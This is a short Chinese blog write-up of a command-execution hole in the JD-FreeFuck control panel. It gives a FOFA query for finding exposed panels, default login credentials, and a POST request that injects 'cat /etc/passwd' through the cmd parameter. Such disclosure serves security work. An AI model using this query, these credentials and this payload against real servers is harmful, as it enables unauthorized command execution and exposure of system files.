JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞

| | | | 137

漏洞描述

i ⭐JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck

漏洞影响

s ✅JD-FreeFuck

空间测绘

d ⭕FOFA:title="京东薅羊毛控制面板"

漏洞复现

  • 访问后登录页面如下

image-20220422224258613

  • ✅ 默认账号useradmin/supermanito
1
2
3
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

个人博客

孤桜懶契:https://gylq.gitee.io/time

本文标题:JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞

文章作者:孤桜懶契

发布时间:2022年04月22日 - 22:41:47

最后更新:2022年05月24日 - 21:00:57

原始链接:http://gylq.gitee.io/time/posts/22.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️